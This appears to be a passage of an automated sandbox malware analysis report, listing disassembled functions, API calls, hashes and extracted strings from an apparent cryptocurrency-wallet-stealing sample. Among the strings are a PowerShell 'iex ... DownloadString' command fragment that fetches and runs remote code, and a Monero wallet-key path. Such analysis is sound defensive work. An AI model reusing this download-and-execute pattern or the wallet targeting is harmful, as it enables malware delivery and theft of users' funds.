                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                        • String ID:
                                        • API String ID: 2540262943-0
                                        • Opcode ID: b7e0c3eba68c874662756c1aef9b0971f19d979b579ffd474e1bf6c0027d12f1
                                        • Instruction ID: 39a001fc620323ae7a7b99e171833b9f678e9aafcdb2b2dde5ce25713ad1834c
                                        • Opcode Fuzzy Hash: b7e0c3eba68c874662756c1aef9b0971f19d979b579ffd474e1bf6c0027d12f1
                                        • Instruction Fuzzy Hash: 213180B2900208A7DB10FBB0DC85FED737CBB58701F404589B719A6081EE78978DCBA6
                                        Function 00A52C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00A5A740: lstrcpy.KERNEL32(00A60E17,00000000), ref: 00A5A788
                                          • Part of subcall function 00A5A9B0: lstrlen.KERNEL32(?,016091B8,?,\Monero\wallet.keys,00A60E17), ref: 00A5A9C5
                                          • Part of subcall function 00A5A9B0: lstrcpy.KERNEL32(00000000), ref: 00A5AA04
                                          • Part of subcall function 00A5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A5AA12
                                          • Part of subcall function 00A5A920: lstrcpy.KERNEL32(00000000,?), ref: 00A5A972
                                          • Part of subcall function 00A5A920: lstrcat.KERNEL32(00000000), ref: 00A5A982
                                          • Part of subcall function 00A5A8A0: lstrcpy.KERNEL32(?,00A60E17), ref: 00A5A905
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 00A52D85
                                        Strings
                                        • ')", xrefs: 00A52CB3
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00A52D04
                                        • <, xrefs: 00A52D39
                                        • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00A52CC4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                        • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        • API String ID: 3031569214-898575020
                                        • Opcode ID: cfb1c826fba4ca0c7bad6e7d744e612a8092b7d5f4dd78cd5acac6bbe5711172
                                        • Instruction ID: d7dc141dfd1e063490e6f4fde2ceec749b486a1c4789e3ddc1fac06c84dfad10
                                        • Opcode Fuzzy Hash: cfb1c826fba4ca0c7bad6e7d744e612a8092b7d5f4dd78cd5acac6bbe5711172
                                        • Instruction Fuzzy Hash: 8D41BD71E102089ADB14EBA0C992FEDBB74BF24301F404619F916B7191EF746A8ECF91
                                        Function 00A49E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00A49F41
                                          • Part of subcall function 00A5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A5A7E6
                                          • Part of subcall function 00A5A740: lstrcpy.KERNEL32(00A60E17,00000000), ref: 00A5A788
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$AllocLocal
                                        • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                        • API String ID: 4171519190-1096346117
                                        • Opcode ID: d007f56b46498e3a91e95704af996f04b514c4edca7f40fe6997f1bc54b7f5eb
                                        • Instruction ID: 8899c93c07b1327d21e3d40ff8dd8de84d0d16d84345cc3bff896a245c47aa58
                                        • Opcode Fuzzy Hash: d007f56b46498e3a91e95704af996f04b514c4edca7f40fe6997f1bc54b7f5eb
                                        • Instruction Fuzzy Hash: 52615174A10248EBDB14EFA4CD96FEE7775BFA4344F008518F90A9F181EB706A49CB52
                                        Function 00A540B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegOpenKeyExA.ADVAPI32(80000001,0160DD40,00000000,00020119,?), ref: 00A540F4
                                        • RegQueryValueExA.ADVAPI32(?,0160E1E8,00000000,00000000,00000000,000000FF), ref: 00A54118
                                        • RegCloseKey.ADVAPI32(?), ref: 00A54122
                                        • lstrcat.KERNEL32(?,00000000), ref: 00A54147
                                        • lstrcat.KERNEL32(?,0160E230), ref: 00A5415B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$CloseOpenQueryValue
                                        • String ID:
                                        • API String ID: 690832082-0
                                        • Opcode ID: 62a53b1c63ed2c92d3a2aade0cab95d91d0aa2ccb706c562d6f73e348eb61ea9
                                        • Instruction ID: 12dc605af181f37247e5e9a618da62488542bd959fc4374d92ad635adecf9833
                                        • Opcode Fuzzy Hash: 62a53b1c63ed2c92d3a2aade0cab95d91d0aa2ccb706c562d6f73e348eb61ea9
                                        • Instruction Fuzzy Hash: 674189B6D10108ABEB14EBA0DD4AFFE737DBB88300F404559BB1557181EA755B8C8BE2
                                        Function 00A56920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetSystemTime.KERNEL32(?), ref: 00A5696C
                                        • sscanf.NTDLL ref: 00A56999
                                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00A569B2
                                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00A569C0
                                        • ExitProcess.KERNEL32 ref: 00A569DA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Time$System$File$ExitProcesssscanf
                                        • String ID:
                                        • API String ID: 2533653975-0
                                        • Opcode ID: 9b881d7ec65a488ed70a93fbb00b8d0f78f599a16903f4c3d00c33a695415d91
                                        • Instruction ID: 9c3c83a13e2217fea8c80618d08fd5d43a73500f641831c71001a681361131ee
                                        • Opcode Fuzzy Hash: 9b881d7ec65a488ed70a93fbb00b8d0f78f599a16903f4c3d00c33a695415d91
                                        • Instruction Fuzzy Hash: C321ECB5D14208ABDF04EFE4D945AEEB7B9FF48301F04852EE506E3250EB345609CBA9
                                        Function 00A57E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A57E37
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00A57E3E
                                        • RegOpenKeyExA.ADVAPI32(80000002,015FBF40,00000000,00020119,?), ref: 00A57E5E
                                        • RegQueryValueExA.ADVAPI32(?,0160DD60,00000000,00000000,000000FF,000000FF), ref: 00A57E7F
                                        • RegCloseKey.ADVAPI32(?), ref: 00A57E92
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                        • String ID:
                                        • API String ID: 3225020163-0
                                        • Opcode ID: 6c6f71576b6c1b72513897e12b0840eedab641959b2e9d27a7cd33b4244e3c90
                                        • Instruction ID: c2966c6470710998612580c7e9514f3f1706072fb0c3c1fd955c6d0b2070caac
                                        • Opcode Fuzzy Hash: 6c6f71576b6c1b72513897e12b0840eedab641959b2e9d27a7cd33b4244e3c90
                                        • Instruction Fuzzy Hash: 19115EB1A44205FBEB10CF94ED4AFBFBBB8FB44B11F10415AFA05A7280D77458048BA5
                                        Function 00A59260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • StrStrA.SHLWAPI(0160E068,?,?,?,00A5140C,?,0160E068,00000000), ref: 00A5926C
                                        • lstrcpyn.KERNEL32(00C8AB88,0160E068,0160E068,?,00A5140C,?,0160E068), ref: 00A59290
                                        • lstrlen.KERNEL32(?,?,00A5140C,?,0160E068), ref: 00A592A7
                                        • wsprintfA.USER32 ref: 00A592C7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpynlstrlenwsprintf
                                        • String ID: %s%s
                                        • API String ID: 1206339513-3252725368
                                        • Opcode ID: d63ea1a98d951cfe9b70937f98db1658d483a828838750b490f79750ce2d187d
                                        • Instruction ID: 43f2048f34d8dc55f592cc30da63cbdf9fd528fcf1c1cc027cc4dfd2b161085b
                                        • Opcode Fuzzy Hash: d63ea1a98d951cfe9b70937f98db1658d483a828838750b490f79750ce2d187d
                                        • Instruction Fuzzy Hash: DA01DE75500208FFDB04DFECC984EAE7BB9FB48355F108549F9099B245C635EA40DB95
                                        Function 00A412A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A412B4
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00A412BB
                                        • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00A412D7
                                        • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00A412F5
                                        • RegCloseKey.ADVAPI32(?), ref: 00A412FF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                        • String ID:
                                        • API String ID: 3225020163-0
                                        • Opcode ID: 6bdecf6adc04e8f76802fac5956d7545bdb7539560695fa4864ba7347bafcc6c
                                        • Instruction ID: 2f65f982d706bf6ed79863e364944e398b52383b442f8062c3093c6fe476f79f
                                        • Opcode Fuzzy Hash: 6bdecf6adc04e8f76802fac5956d7545bdb7539560695fa4864ba7347bafcc6c
                                        • Instruction Fuzzy Hash: 9E0136B9A40208BBEB00DFD0DC49FAEB7B8EB48701F008159FA05D72C0D6749A019F55
                                        Function 00A5C84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: String___crt$Type
                                        • String ID:
                                        • API String ID: 2109742289-3916222277
                                        • Opcode ID: 853d46ff129cd9bd39e2d519ac8ece3d383d6e1f1d7b72dc886cb5f6d09dc218
                                        • Instruction ID: bc86f3a6334949a6021b638980b05e1d2b0e569b585534eb99ba7842e024b4ed
                                        • Opcode Fuzzy Hash: 853d46ff129cd9bd39e2d519ac8ece3d383d6e1f1d7b72dc886cb5f6d09dc218
                                        • Instruction Fuzzy Hash: 5F41D4B150079C9EDB218B248D84BFBBBF8BB45715F1444A8ED8A86186D2719A49CF60
                                        Function 00A56630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00A56663
                                          • Part of subcall function 00A5A740: lstrcpy.KERNEL32(00A60E17,00000000), ref: 00A5A788
                                          • Part of subcall function 00A5A9B0: lstrlen.KERNEL32(?,016091B8,?,\Monero\wallet.keys,00A60E17), ref: 00A5A9C5
                                          • Part of subcall function 00A5A9B0: lstrcpy.KERNEL32(00000000), ref: 00A5AA04
                                          • Part of subcall function 00A5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A5AA12
                                          • Part of subcall function 00A5A8A0: lstrcpy.KERNEL32(?,00A60E17), ref: 00A5A905
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 00A56726
                                        • ExitProcess.KERNEL32 ref: 00A56755
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                        • String ID: <
                                        • API String ID: 1148417306-4251816714
                                        • Opcode ID: 5a15be8a490a2397eca2187096fb37ceb483a997dd0a910824030441dfc3b7d5
                                        • Instruction ID: 54017a9601416e3f119df8661e3935a344eca7bae3148246055f97e8cfd1b9a4
                                        • Opcode Fuzzy Hash: 5a15be8a490a2397eca2187096fb37ceb483a997dd0a910824030441dfc3b7d5
                                        • Instruction Fuzzy Hash: 333149B1901218AADB14EB90DD82BDEB778BF14301F404299F70966191DF746B48CF6A
                                        Function 00A587C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                                        Download Yara Rule
                                        APIs
